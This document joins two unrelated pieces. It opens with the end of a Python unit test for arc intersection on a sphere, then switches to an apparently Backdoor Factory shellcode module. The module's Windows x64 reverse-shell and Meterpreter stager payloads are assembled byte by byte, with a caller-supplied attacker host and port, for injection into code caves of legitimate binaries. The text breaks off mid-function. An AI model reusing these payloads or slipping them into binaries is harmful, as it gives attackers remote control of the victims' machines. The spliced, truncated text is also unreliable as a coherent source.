p5_ = Coordinate(1, 1)
p6_ = Coordinate(1, -1)
arc13 = Arc(p1_, p3_)
arc24 = Arc(p2_, p4_)
arc32 = Arc(p3_, p2_)
arc41 = Arc(p4_, p1_)
arc40 = Arc(p4_, p0_)
arc56 = Arc(p5_, p6_)
arc45 = Arc(p4_, p5_)
arc02 = Arc(p0_, p2_)
arc35 = Arc(p3_, p5_)
self.assertTrue(arc13.intersects(arc24))
self.assertFalse(arc32.intersects(arc41))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc45.intersects(arc02))
self.assertTrue(arc35.intersects(arc24))
p0_ = Coordinate(180, 0)
p1_ = Coordinate(180, 1)
p2_ = Coordinate(-179, 0)
p3_ = Coordinate(-180, -1)
p4_ = Coordinate(179, 0)
p5_ = Coordinate(-179, 1)
p6_ = Coordinate(-179, -1)
arc13 = Arc(p1_, p3_)
arc24 = Arc(p2_, p4_)
arc32 = Arc(p3_, p2_)
arc41 = Arc(p4_, p1_)
arc40 = Arc(p4_, p0_)
arc56 = Arc(p5_, p6_)
arc45 = Arc(p4_, p5_)
arc02 = Arc(p0_, p2_)
arc35 = Arc(p3_, p5_)
self.assertTrue(arc13.intersects(arc24))
self.assertFalse(arc32.intersects(arc41))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc45.intersects(arc02))
self.assertTrue(arc35.intersects(arc24))
# case of the north pole
p0_ = Coordinate(0, 90)
p1_ = Coordinate(0, 89)
p2_ = Coordinate(90, 89)
p3_ = Coordinate(180, 89)
p4_ = Coordinate(-90, 89)
p5_ = Coordinate(45, 89)
p6_ = Coordinate(135, 89)
arc13 = Arc(p1_, p3_)
arc24 = Arc(p2_, p4_)
arc32 = Arc(p3_, p2_)
arc41 = Arc(p4_, p1_)
arc40 = Arc(p4_, p0_)
arc56 = Arc(p5_, p6_)
arc45 = Arc(p4_, p5_)
arc02 = Arc(p0_, p2_)
arc35 = Arc(p3_, p5_)
self.assertTrue(arc13.intersects(arc24))
self.assertFalse(arc32.intersects(arc41))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc45.intersects(arc02))
self.assertTrue(arc35.intersects(arc24))
|
''''
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
##########################################################
# BEGIN win64 shellcodes #
##########################################################
import struct
import sys
from intelmodules import eat_code_caves
class winI64_shellcode():
"""
Windows Intel x64 shellcode class
"""
def __init__(self, HOST, PORT, SUPPLIED_SHELLCODE):
self.HOST = HOST
self.PORT = PORT
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.shellcode = ""
self.stackpreserve = ("\x90\x90\x50\x53\x51\x52\x56\x57\x54\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
self.stackrestore = ("\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58"
)
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def reverse_shell_tcp(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/x64/shell_reverse_tcp
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\xfc"
"\x48\x83\xe4\xf0"
"\xe8")
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xc0\x00\x00\x00"
self.shellcode1 += ("\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff")
self.shellcode2 = ("\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x90\x90\x90\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda"
"\x48\x81\xc4\xf8\x00\x00\x00" # Add RSP X ; align stack
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def cave_miner(self, flItms, CavesPicked={}):
"""
Sample code for finding sutable code caves
"""
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ""
if flItms['cave_jumping'] is True:
if breakupvar > 0:
self.shellcode1 += "\xe9"
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
#else:
# self.shellcode1 += "\xc0\x00\x00\x00"
self.shellcode1 += ("\x90" * 13)
self.shellcode2 = ("\x90" * 19)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def reverse_tcp_stager(self, flItms, CavesPicked={}):
"""
Ported the x32 payload from msfvenom for patching win32 binaries (shellcode1)
with the help of Steven Fewer's work on msf win64 payloads.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
flItms['stager'] = True
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\x90" # <--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" # jmp to allocate
#api_call
"\x41\x51" # push r9
"\x41\x50" # push r8
"\x52" # push rdx
"\x51" # push rcx
"\x56" # push rsi
"\x48\x31\xD2" # xor rdx,rdx
"\x65\x48\x8B\x52\x60" # mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" # mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" # mov rdx,qword ptr[rdx+32]
#next_mod
"\x48\x8b\x72\x50" # mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" # movzx rcx,word [rdx+74]
"\x4d\x31\xc9" # xor r9,r9
#loop_modname
"\x48\x31\xc0" # xor rax,rax
"\xac" # lods
"\x3c\x61" # cmp al, 61h (a)
"\x7c\x02" # jl 02
"\x2c\x20" # sub al, 0x20
#not_lowercase
"\x41\xc1\xc9\x0d" # ror r9d, 13
"\x41\x01\xc1" # add r9d, eax
"\xe2\xed" # loop until read, back to xor rax, rax
"\x52" # push rdx ; Save the current position in the module list for later
"\x41\x51" # push r9 ; Save the current module hash for later
# ; Proceed to itterate the export address table,
"\x48\x8b\x52\x20" # mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" # mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" # mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" # test rax, rax ; Test if no export address table is present
"\x74\x67" # je get_next_mod1 ; If no EAT present, process the next module
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x50" # push rax ; Save the current modules EAT
"\x8b\x48\x18" # mov ecx, dword [rax+24] ; Get the number of function names
"\x44\x8b\x40\x20" # mov r8d, dword [rax+32] ; Get the rva of the function names
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
# ; Computing the module hash + function hash
#get_next_func: ;
"\xe3\x56" # jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
"\x48\xff\xc9" # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" # xor r9, r9 ; Clear r9 which will store the hash of the function name
# ; And compare it to the one we wan
#loop_funcname: ;
"\x48\x31\xc0" # xor rax, rax ; Clear rax
"\xac" # lodsb ; Read in the next byte of the ASCII function name
"\x41\xc1\xc9\x0d" # ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" # add r9d, eax ; Add the next byte of the name
"\x38\xe0" # cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
"\x75\xf1" # jne loop_funcname ; If we have not reached the null terminator, continue
"\x4c\x03\x4c\x24\x08" # add r9, [rsp+8] ; Add the current module hash to the function hash
"\x45\x39\xd1" # cmp r9d, r10d ; Compare the hash to the one we are searchnig for
"\x75\xd8" # jnz get_next_func ; Go compute the next function hash if we have not found it
# ; If found, fix up stack, call the function and then value else compute the next one...
"\x58" # pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" # mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" # mov r8d, dword [rax+28] ; Get the function addresses table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" # mov eax, dword [r8+4*rcx]; Get the desired functions RVA
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address to get the functions actual VA
# ; We now fix up the stack and perform the call to the drsired function...
#finish:
"\x41\x58" # pop r8 ; Clear off the current modules hash
"\x41\x58" # pop r8 ; Clear off the current position in the module list
"\x5E" # pop rsi ; Restore RSI
"\x59" # pop rcx ; Restore the 1st parameter
"\x5A" # pop rdx ; Restore the 2nd parameter
"\x41\x58" # pop r8 ; Restore the 3rd parameter
"\x41\x59" # pop r9 ; Restore the 4th parameter
"\x41\x5A" # pop r10 ; pop off the return address
"\x48\x83\xEC\x20" # sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
# ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
"\x41\x52" # push r10 ; push back the return address
"\xFF\xE0" # jmp rax ; Jump into the required function
# ; We now automagically return to the correct caller...
# get_next_mod:
"\x58" # pop rax ; Pop off the current (now the previous) modules EAT
# get_next_mod1:
"\x41\x59" # pop r9 ; Pop off the current (now the previous) modules hash
"\x5A" # pop rdx ; Restore our position in the module list
"\x48\x8B\x12" # mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module
)
# allocate
self.shellcode1 += ("\x5d" # pop rbp
"\x49\xc7\xc6\xab\x01\x00\x00" # mov r14, 1abh size of payload
"\x6a\x40" # push 40h
"\x41\x59" # pop r9 now 40h
"\x68\x00\x10\x00\x00" # push 1000h
"\x41\x58" # pop r8.. now 1000h
"\x4C\x89\xF2" # mov rdx, r14
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x68\x58\xa4\x53\xe5" # push E553a458
"\x41\x5A" # pop r10
"\xff\xd5" # call rbp
"\x48\x89\xc3" # mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address
"\x48\xC7\xC1\xAB\x01\x00\x00" # mov rcx, 0x1ab
)
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x43"
# got_payload:
self.shellcode1 += ("\x5e" # pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" # rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" # call set_handler ; Configure error handling
#Not Used... :/ Can probably live without..
#exitfunk:
#"\x48\xC7\xC3\xE0\x1D\x2A\x0A" # mov rbx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
#"\x68\xa6\x95\xbd\x9d" # push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
#"\xFF\xD5" # call rbp ; GetVersion(); (AL will = major version and AH will = minor version)
#"\x3C\x06" # cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
#"\x7c\x0a" # jl goodbye ; Then just call the exit function...
#"\x80\xFB\xE0" # cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
#"\x75\x05" # jne goodbye ;
#"\x48\xC7\xC3\x47\x13\x72\x6F" # mov rbx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
# goodbye: ; We now perform the actual call to the exit function
#"\x6A\x00" # push byte 0 ; push the exit function parameter
#"\x53" # push rbx ; push the hash of the exit function
#"\xFF\xD5" # call rbp ; call EXITFUNK( 0 );
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" # mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
"\xFF\xD5" # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" # add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xE9\xab\x01\x00\x00"
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 244).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
"""
shellcode2
/*
* windows/x64/shell/reverse_tcp - 422 bytes (stage 1)
^^windows/x64/meterpreter/reverse_tcp will work with this
* http://www.metasploit.com
* VERBOSE=false, LHOST=127.0.0.1, LPORT=8080,
* ReverseConnectRetries=5, ReverseListenerBindPort=0,
* ReverseAllowProxy=false, EnableStageEncoding=false,
* PrependMigrate=false, EXITFUNC=thread,
* InitialAutoRunScript=, AutoRunScript=
*/
"""
#payload
self.shellcode2 += ("\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00"
#"\x1f\x90"
#"\x7f\x00\x00\x01"
)
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x48\x83\xec"
"\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9\x41"
"\xba\x02\xd9\xc8\x5f\xff\xd5\x48\x83\xc4\x20\x5e\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41"
"\xff\xe7"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def meterpreter_reverse_https(self, flItms, CavesPicked={}):
"""
Win64 version
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
flItms['stager'] = True
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ( "\x90" #<--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" #jmp to allocate
#api_call
"\x41\x51" #push r9
"\x41\x50" #push r8
"\x52" #push rdx
"\x51" #push rcx
"\x56" #push rsi
"\x48\x31\xD2" #xor rdx,rdx
"\x65\x48\x8B\x52\x60" #mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" #mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" #mov rdx,qword ptr[rdx+32]
#next_mod
"\x48\x8b\x72\x50" #mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" #movzx rcx,word [rdx+74]
"\x4d\x31\xc9" #xor r9,r9
#loop_modname
"\x48\x31\xc0" #xor rax,rax
"\xac" #lods
"\x3c\x61" #cmp al, 61h (a)
"\x7c\x02" #jl 02
"\x2c\x20" #sub al, 0x20
#not_lowercase
"\x41\xc1\xc9\x0d" #ror r9d, 13
"\x41\x01\xc1" #add r9d, eax
"\xe2\xed" #loop until read, back to xor rax, rax
"\x52" #push rdx ; Save the current position in the module list for later
"\x41\x51" #push r9 ; Save the current module hash for later
#; Proceed to itterate the export address table,
"\x48\x8b\x52\x20" #mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" #mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" #mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" #test rax, rax ; Test if no export address table is present
"\x74\x67" #je get_next_mod1 ; If no EAT present, process the next module
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address
"\x50" #push rax ; Save the current modules EAT
"\x8b\x48\x18" #mov ecx, dword [rax+24] ; Get the number of function names
"\x44\x8b\x40\x20" #mov r8d, dword [rax+32] ; Get the rva of the function names
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
#; Computing the module hash + function hash
#get_next_func: ;
"\xe3\x56" #jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
"\x48\xff\xc9" # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" # xor r9, r9 ; Clear r9 which will store the hash of the function name
# ; And compare it to the one we wan
#loop_funcname: ;
"\x48\x31\xc0" #xor rax, rax ; Clear rax
"\xac" #lodsb ; Read in the next byte of the ASCII function name
"\x41\xc1\xc9\x0d" #ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" #add r9d, eax ; Add the next byte of the name
"\x38\xe0" #cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
"\x75\xf1" #jne loop_funcname ; If we have not reached the null terminator, continue
"\x4c\x03\x4c\x24\x08" #add r9, [rsp+8] ; Add the current module hash to the function hash
"\x45\x39\xd1" #cmp r9d, r10d ; Compare the hash to the one we are searchnig for
"\x75\xd8" #jnz get_next_func ; Go compute the next function hash if we have not found it
#; If found, fix up stack, call the function and then value else compute the next one...
"\x58" #pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" #mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" #mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" #mov r8d, dword [rax+28] ; Get the function addresses table rva
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" #mov eax, dword [r8+4*rcx]; Get the desired functions RVA
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address to get the functions actual VA
#; We now fix up the stack and perform the call to the drsired function...
#finish:
"\x41\x58" #pop r8 ; Clear off the current modules hash
"\x41\x58" #pop r8 ; Clear off the current position in the module list
"\x5E" #pop rsi ; Restore RSI
"\x59" #pop rcx ; Restore the 1st parameter
"\x5A" #pop rdx ; Restore the 2nd parameter
"\x41\x58" #pop r8 ; Restore the 3rd parameter
"\x41\x59" #pop r9 ; Restore the 4th parameter
"\x41\x5A" #pop r10 ; pop off the return address
"\x48\x83\xEC\x20" #sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
# ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
"\x41\x52" #push r10 ; push back the return address
"\xFF\xE0" #jmp rax ; Jump into the required function
#; We now automagically return to the correct caller...
#get_next_mod: ;
"\x58" #pop rax ; Pop off the current (now the previous) modules EAT
#get_next_mod1: ;
"\x41\x59" #pop r9 ; Pop off the current (now the previous) modules hash
"\x5A" #pop rdx ; Restore our position in the module list
"\x48\x8B\x12" #mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" #jmp next_mod ; Process this module
)
self.shellcode1 += (#allocate
"\x5d" #pop rbp
"\x49\xc7\xc6" #mov r14, 1abh size of payload...
)
self.shellcode1 += struct.pack("<H", 583 + len(self.HOST))
self.shellcode1 += ("\x00\x00"
"\x6a\x40" #push 40h
